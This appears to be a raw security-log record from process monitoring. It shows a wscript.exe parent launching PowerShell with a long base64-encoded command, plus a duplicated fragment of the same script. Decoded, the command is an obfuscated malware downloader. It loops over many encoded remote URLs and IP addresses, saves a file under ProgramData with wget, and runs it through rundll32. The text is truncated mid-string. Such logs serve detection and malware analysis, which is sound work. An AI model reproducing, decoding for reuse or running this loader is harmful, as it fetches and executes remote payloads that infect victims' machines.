UQBCADAAQQBHAFUAQQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgB1AEEARwBVAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgB6AEEARwA4AEEAYgBBAEIAaABBAEgASQBBAEkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBpAEEARwBFAEEAYgBBAEIAaABBAEcANABBAGIAdwBCAHcAQQBHAGcAQQBiAHcAQgB5AEEARwBrAEEAYgBnAEEAdQBBAEgAYwBBAGEAUQBCAHIAQQBHAGsAQQAiADsAJABvAHUAdABjAG8AbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFMAbABhAHYAbwBjAHIAYQB0AGkAYwBDAG8AbgBmAGUAcwBzAGUAcwApACkAOwB3AGcAZQB0ACAAJABvAHUAdABjAG8AbQBlACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGEAZQBjAGkAZABpAHUAbQAuAEEAdAB0AGUAbgB1AGEAdABvAHIAOwAkAGYAaQBnAGUAYQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAMgBBAEMANABBAE0AUQBBAHgAQQBEAEkAQQAiADsAJABWAGUAcgBuAGEAbABpAHQAeQBNAGkAYwByAG8AcABoAG8AbgBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATwBRAEEAeQBBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABBAEEAbwBaAFQAawBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAHcAQQBZAFEAQgB3AEEARwBJAEEAYgB3AEIAaABBAEgASQBBAFoAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwBZAEEAWQBRAEIAagBBAEcAVQBBAEwAZwBCAHoAQQBHAFUAQQBvAFoAVABrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB0AEEASABBAEEAYgBBAEIAbABBAEcAUQBBAEwAZwBCADUAQQBHADgAQQBhAHcAQgB2AEEARwBnAEEAWQBRAEIAdABBAEcARQBBACIAOwAkAHIAYQBqAGUAcwBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAFkAQQBMAGcAQQB4AEEARABZAEEATQB3AEEAdQBBAEQAawBBAE0AdwBBAD0APQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdQBBAEcAOABBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQgAyAEEARwA4AEEAZABRAEIAegBBAEcAdwBBAGUAUQBCAFEAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABnAEIAcABBAEcANABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABRAEEAYQBRAEIAbABBAEcANABBAFoAQQBCAGgAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABhAGUAYwBpAGQAaQB1AG0ALgBBAHQAdABlAG4AdQBhAHQAbwByACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA2ADUANAAwADUAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAEUAQQBaAFEAQgBqAEEARwBrAEEAWgBBAEIAcABBAEgAVQBBAGIAUQBBAHUAQQBFAEUAQQBkAEEAQgAwAEEARwBVAEEAYgBnAEIAMQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAGMAdwBCAHMAQQBHAEUAQQBZAHcAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBACIAOwAkAEUAYQBzAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwB3AEEAYgBBAEIAaABBAEcAMABBAGIAdwBCADAAQQBIAFEAQQBhAFEAQQB1AEEARwBNAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCADAAQQBBAD0APQBrAHIAVABFAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAOABBAGMAZwBCAHkAQQBIAFUAQQBjAEEAQgAwAEEARwB3AEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAGgAQQBIAFUAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEEAPQA9AGsAcgBUAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAE0AQQBaAFEAQgBzAEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAEwAZwBCAHkAQQBHAFUAQQBhAFEAQgB6AEEARwBVAEEAawByAFQARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAGsAQQBjAHcAQgBsAEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBHAFEAQQBMAGcAQgBoAEEARwB3AEEAYwB3AEIAaABBAEcATQBBAFoAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAGEAbgBzAGEAcgBUAGEAcgByAHkAaQBuAGcAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBAHoAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATgBBAEEAdQBBAEQASQBBAE4AQQBBADQAQQBBAD0APQBVAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABZAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAEEAQQAwAEEAQwA0AEEATQBRAEEAegBBAEQARQBBAFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAFEAQQB1AEEARABFAEEATQBRAEEAMwBBAEEAPQA9AFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATQBnAEEAeQBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQAiADsAJABNAGkAeAB0AGkAbABpAG4AZQBhAHIARQBuAGQAYQBuAGcAZQBpAHQAaQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBjAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBRAHcAQgAxAEEARwB3AEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAHoAQQBIAFUAQQBjAEEAQgB3AEEARwA4AEEAYwBnAEIAMABBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABBAEEATABnAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABjAEEATgB3AEEAPQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGUAUQBCAHcAQQBHAFUAQQBaAGcAQgB2AEEASABJAEEAYgBRAEEAdQBBAEcASQBBAFkAUQBCAHkAQQBHAGMAQQBZAFEAQgBwAEEARwA0AEEAYwB3AEEAPQAiADsAfQB9ACQAcwB3AGUAZQB0AGkAZQB3AGkAZgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBFAEEAYgBBAEIAegBBAEcAawBBAFoAZwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAHoAQQBBAD0APQAiADsA"
parent_process	wscript.exe	martian_process	powershell -encodedcommand "JABjAGEAcABzAGkAYwB1AG0AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEkAQQBNAGcAQQAzAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQAzAEEAQwA0AEEATgB3AEEAegBBAEMANABBAE4AdwBBAHcAQQBDADQAQQBPAEEAQQAwAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEkAQQBMAGcAQQB5AEEARABFAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABjAEEAIgA7ACQAVAB1AGIAZgBpAHMAaABlAHMAUwBsAHUAbQBwAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAYwBBAGMAZwBCAGgAQQBHADQAQQBkAFEAQgBzAEEARwA4AEEAWQB3AEIANQBBAEgAUQBBAGIAdwBCAHcAQQBHADgAQQBhAFEAQgBsAEEASABNAEEAYQBRAEIAegBBAEMANABBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEASABBAEEAYwBnAEIAcABBAEgATQBBAFoAUQBCAHoAQQBBAD0APQBGAE8AdwBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAHAAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQgBRAEEASABJAEEAYgB3AEIAdwBBAEcAOABBAFoAQQBCAHAAQQBHAEUAQQBiAEEAQgBsAEEAQwA0AEEAWgBBAEIAbABBAEEAPQA9ACIAOwAkAEwAbwB3AGIAcgBlAGQARAB5AHMAawBpAG4AZQBzAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGMAZwBCAHYAQQBHAHcAQQBiAEEAQgBsAEEASABrAEEAWQBnAEIAMQBBAEgATQBBAEwAZwBCAGoAQQBHAEUAQQBjAHcAQgBvAEEAQQA9AD0ATgBvAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AZwBBAHcAQQBEAFUAQQBMAGcAQQA1AEEARABNAEEATABnAEEAeABBAEQAQQBBAE8AUQBBAD0ATgBvAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBOAEEAQQA1AEEAQwA0AEEATQBnAEEAegBBAEQASQBBAE4AbwBMAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAbwBBAGIAdwBCADUAQQBIAGMAQQBaAFEAQgBsAEEARwBRAEEATABnAEIAMABBAEcAOABBAGQAdwBCAHUAQQBBAD0APQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAyADsAJABVAG4AdABhAHgAaQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBiAGcAQgBuAEEARwBFAEEAYgBBAEIAaABBAEMANABBAGQAZwBCAGoAQQBBAD0APQBZAGwAcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAFEAQQB3AEEARABJAEEAWQBsAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCAHMAQQBHAE0AQQBZAFEAQgB1AEEARwBVAEEAWQBRAEIAdQBBAEMANABBAGQAZwBCAHYAQQBIAGsAQQBZAFEAQgBuAEEARwBVAEEAWQBsAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAGcAQQAyAEEARABZAEEATABnAEEAMgBBAEQASQBBACIAOwAkAFAAcgBpAG0AaQB0AGkAYQBlAFMAYwByAHUAdABvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEATgBnAEEAMgBBAEQAUQBBAGIAdwBBADIAQQBIAEUAQQBkAGcAQgBqAEEARwBVAEEAYQBnAEEAPQBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE4AdwBBADUAQQBDADgAQQBVAEEAQgBzAEEARQB3AEEATgBBAEIAdABBAEYAVQBBAEwAdwBCAHAAQQBIAEUAQQBSAHcAQgBNAEEARABjAEEAUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAVQBBAEIASwBBAEcAbwBBAFIAZwBBADMAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAGwAYQB2AG8AYwByAGEAdABpAGMAQwBvAG4AZgBlAHMAcwBlAHMAIABpAG4AIAAkAFAAcgBpAG0AaQB0AGkAYQBlAFMAYwByAHUAdABvACAALQBzAHAAbABpAHQAIAAiAFMAIgApACAAewAkAEYAbAB1AHMAaABpAG4AZwBsAHkARQBwAGkAegBvAGEAcgBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAOABBAFoAQQBCAG0AQQBIAFUAQQBiAEEAQgBFAEEARwBVAEEAYwBBAEIAbABBAEcANABBAFoAQQBCAGgAQQBHADQAQQBkAEEAQgBzAEEASABrAEEATABnAEIAegBBAEcAZwBBAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBnAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwA4AEEAWQBnAEIAcwBBAEcAawBBAGQAQQBCAGwAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEgATQBBAFYAUQBCADIAQQBHAEUAQQBjAGcAQgB2AEEASABZAEEAYQBRAEIAMABBAEcAVQBBAEwAZwBCAGoAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABBAEIAagBBAEcARQBBAGMAZwBCAGsAQQBBAD0APQAiADsAdAByAHkAIAB7ACQATABvAG8AZgBhAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQAxAEEARABNAEEAVgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBrAEEARwBVAEEAYwBnAEIAegBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBhAFEAQgB1AEEARwBjAEEATABnAEIAegBBAEcARQBBAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABBAEEATABnAEEAMABBAEQAUQBBAEwAZwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATQBRAEEAMgBBAEEAPQA9AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBBAEIAcwBBAEcAOABBAGQAQQBCAHkAQQBHADgAQQBjAEEAQgBsAEEASABNAEEATABnAEIAbABBAEcAMABBAFkAUQBCAHAAQQBHAHcAQQAiADsAJABLAGUAZQBuAGkAbgBnAFQAaABlAG8AcABoAGEAZwB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBFAEEARwBFAEEAYgBBAEIAagBBAEcARQBBAGMAdwBCAHoAQQBHAGsAQQBZAFEAQgB1AEEARgBVAEEAYgBnAEIAegBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAMABBAEgAawBBAEwAZwBCAHoAQQBHAFUAQQBlAEEAQgA1AEEAQQA9AD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAFEAQQBhAFEAQgAyAEEARwBVAEEAYwBnAEIAbgBBAEcAVQBBAGIAZwBCAGoAQQBHAFUAQQBjAHcAQgBCAEEARwB3AEEAWQBRAEIAeQBBAEcAMABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABjAEEAWgBRAEIAaQBBAEgATQBBAGEAUQBCADAAQQBHAFUAQQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgB1AEEARwBVAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgB6AEEARwA4AEEAYgBBAEIAaABBAEgASQBBAEkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBpAEEARwBFAEEAYgBBAEIAaABBAEcANABBAGIAdwBCAHcAQQBHAGcAQQBiAHcAQgB5AEEARwBrAEEAYgBnAEEAdQBBAEgAYwBBAGEAUQBCAHIAQQBHAGsAQQAiADsAJABvAHUAdABjAG8AbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFMAbABhAHYAbwBjAHIAYQB0AGkAYwBDAG8AbgBmAGUAcwBzAGUAcwApACkAOwB3AGcAZQB0ACAAJABvAHUAdABjAG8AbQBlACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGEAZQBjAGkAZABpAHUAbQAuAEEAdAB0AGUAbgB1AGEAdABvAHIAOwAkAGYAaQBnAGUAYQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAMgBBAEMANABBAE0AUQBBAHgAQQBEAEkAQQAiADsAJABWAGUAcgBuAGEAbABpAHQAeQBNAGkAYwByAG8AcABoAG8AbgBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATwBRAEEAeQBBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABBAEEAbwBaAFQAawBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAHcAQQBZAFEAQgB3AEEARwBJAEEAYgB3AEIAaABBAEgASQBBAFoAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwBZAEEAWQBRAEIAagBBAEcAVQBBAEwAZwBCAHoAQQBHAFUAQQBvAFoAVABrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB0AEEASABBAEEAYgBBAEIAbABBAEcAUQBBAEwAZwBCADUAQQBHADgAQQBhAHcAQgB2AEEARwBnAEEAWQBRAEIAdABBAEcARQBBACIAOwAkAHIAYQBqAGUAcwBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAFkAQQBMAGcAQQB4AEEARABZAEEATQB3AEEAdQBBAEQAawBBAE0AdwBBAD0APQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdQBBAEcAOABBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQgAyAEEARwA4AEEAZABRAEIAegBBAEcAdwBBAGUAUQBCAFEAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABnAEIAcABBAEcANABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABRAEEAYQBRAEIAbABBAEcANABBAFoAQQBCAGgAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABhAGUAYwBpAGQAaQB1AG0ALgBBAHQAdABlAG4AdQBhAHQAbwByACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA2ADUANAAwADUAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAEUAQQBaAFEAQgBqAEEARwBrAEEAWgBBAEIAcABBAEgAVQBBAGIAUQBBAHUAQQBFAEUAQQBkAEEAQgAwAEEARwBVAEEAYgBnAEIAMQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAGMAdwBCAHMAQQBHAEUAQQBZAHcAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBACIAOwAkAEUAYQBzAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwB3AEEAYgBBAEIAaABBAEcAMABBAGIAdwBCADAAQQBIAFEAQQBhAFEAQQB1AEEARwBNAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCADAAQQBBAD0APQBrAHIAVABFAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAOABBAGMAZwBCAHkAQQBIAFUAQQBjAEEAQgAwAEEARwB3AEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAGgAQQBIAFUAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEEAPQA9AGsAcgBUAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAE0AQQBaAFEAQgBzAEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAEwAZwBCAHkAQQBHAFUAQQBhAFEAQgB6AEEARwBVAEEAawByAFQARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAGsAQQBjAHcAQgBsAEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBHAFEAQQBMAGcAQgBoAEEARwB3AEEAYwB3AEIAaABBAEcATQBBAFoAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAGEAbgBzAGEAcgBUAGEAcgByAHkAaQBuAGcAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBAHoAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATgBBAEEAdQBBAEQASQBBAE4AQQBBADQAQQBBAD0APQBVAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABZAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAEEAQQAwAEEAQwA0AEEATQBRAEEAegBBAEQARQBBAFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAFEAQQB1AEEARABFAEEATQBRAEEAMwBBAEEAPQA9AFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATQBnAEEAeQBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQAiADsAJABNAGkAeAB0AGkAbABpAG4AZQBhAHIARQBuAGQAYQBuAGcAZQBpAHQAaQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBjAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBRAHcAQgAxAEEARwB3AEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAHoAQQBIAFUAQQBjAEEAQgB3AEEARwA4AEEAYwBnAEIAMABBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABBAEEATABnAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABjAEEATgB3AEEAPQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGUAUQBCAHcAQQBHAFUAQQBaAGcAQgB2AEEASABJAEEAYgBRAEEAdQBBAEcASQBBAFkAUQBCAHkAQQBHAGMA